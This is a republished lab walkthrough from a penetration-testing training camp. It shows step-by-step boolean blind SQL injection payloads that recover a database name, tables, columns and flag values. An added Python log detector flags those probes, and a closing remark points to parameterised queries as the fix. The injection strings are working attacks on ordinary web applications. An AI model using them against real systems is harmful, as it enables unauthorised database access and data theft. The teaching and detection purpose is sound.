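Fengshentai: Zero-Basics Penetration Testing Training Camp

Author: Internet

Blind injection: SQL injection when nothing is echoed back

SQL blind injection: Lab A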

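1. Determine the length of the database name:

and length(database())>4 -- length is 12

2. Determine the database name:

and substr(database(),1,1)='k'
and ascii(substr(database(),1,1))>107

Brute-force with Burp: start the server, use the local machine's private network address, and take care when adding the payload variables.

107 97 110 119 111 108 111 110 103 120 105 97 --kanwolongxia

3. Determine how many tables there are and the length of each table name: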

and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1))>1 -- length is 6
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 1,1))>1 -- length is 4
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1))>1 -- length is 3

4. Determine the table names:

and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1),1,1)) = 1

108 111 102 108 97 103 --loflag
110 101 119 115 --news
117 115 101 114 --user

5. Determine the lengths of the column names:

and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))=2
and length((select column_name from information_schema.columns where table_name='loflag' limit 1,1))=6

6. Query the column names:

and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1))>1 -- column is id
and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))>1 -- column is flaglo

7. Determine the length of the actual data:

and length((select flaglo from loflag limit 0,1))=8
and length((select flaglo from loflag limit 1,1))=7
and length((select flaglo from loflag limit 2,1))=10
and length((select flaglo from loflag limit 3,1))=12
and length((select flaglo from loflag limit 4,1))=14

8. Retrieve the actual data:

 and ascii(substr((select flaglo from loflag limit 0,1),1,1))>1 --zKaQ-QQQ
 and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1 --zKaQ-RD
 and ascii(substr((select flaglo from loflag limit 2,1),1,1))>1 --zKaQ-Moren
 and ascii(substr((select flaglo from loflag limit 3,1),1,1))>1 --zKaQ-time-hj
 and ascii(substr((select flaglo from loflag limit 4,1),1,1))>1 --zKaQ-time-zxxz
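
Seen from the defender's side, the eight steps above leave a recognizable trail in the web server's access log. The detector below is an added example, not part of the original post; the log layout, the /index.php path, the id parameter and the client addresses are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# The probes in steps 1-8: and/or + [ascii(] length|substr ( [(] database( | select
PROBE = re.compile(
    r"\b(?:and|or)\s+(?:ascii\s*\(\s*)?(?:length|substr(?:ing)?|mid)\s*\(\s*"
    r"\(?\s*(?:database\s*\(|select\b)", re.IGNORECASE)
# Steps 3-6 additionally enumerate the schema catalog.
SCHEMA = re.compile(r"information_schema\.(?:tables|columns)", re.IGNORECASE)
# Assumed log layout: client "METHOD url HTTP/x" status bytes
REQUEST = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)$')

def classify(url):
    """Return 'schema', 'probe' or None for one request URL."""
    text = unquote_plus(url)          # decode %xx and '+' before matching
    if not PROBE.search(text):
        return None
    return "schema" if SCHEMA.search(text) else "probe"

def detect(lines, threshold=3):
    """Count probe requests per client; return clients at or above threshold."""
    hits = defaultdict(lambda: {"probe": 0, "schema": 0, "sizes": set()})
    for line in lines:
        m = REQUEST.match(line.strip())
        if not m:
            continue
        client, url, _status, size = m.groups()
        kind = classify(url)
        if kind:
            hits[client][kind] += 1
            # Boolean-based blind injection yields a "true" page and a "false"
            # page, so response sizes tend to cluster into two values.
            hits[client]["sizes"].add(int(size))
    return {c: h for c, h in hits.items()
            if h["probe"] + h["schema"] >= threshold}

# Constructed sample log (documentation IP ranges; path and parameter assumed).
SAMPLE_LOG = """\
203.0.113.7 "GET /index.php?id=1%20and%20length(database())%3E4 HTTP/1.1" 200 1843
203.0.113.7 "GET /index.php?id=1%20and%20ascii(substr(database(),1,1))%3E107 HTTP/1.1" 200 1211
203.0.113.7 "GET /index.php?id=1+and+length((select+table_name+from+information_schema.tables+where+table_schema=%27kanwolongxia%27+limit+0,1))%3E1 HTTP/1.1" 200 1843
203.0.113.7 "GET /index.php?id=1+and+ascii(substr((select+flaglo+from+loflag+limit+0,1),1,1))%3E1 HTTP/1.1" 200 1843
198.51.100.20 "GET /index.php?id=2 HTTP/1.1" 200 1843
198.51.100.20 "GET /search.php?q=length+of+substr HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for client, h in detect(SAMPLE_LOG.splitlines()).items():
        print(client, h["probe"], h["schema"], sorted(h["sizes"]))
```

Matching on the decoded URL only surfaces the probing; the underlying fix is to bind the id value as a query parameter so the appended condition is never parsed as SQL.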

Source: https://blog.csdn.net/weixin_51830687/article/details/119462547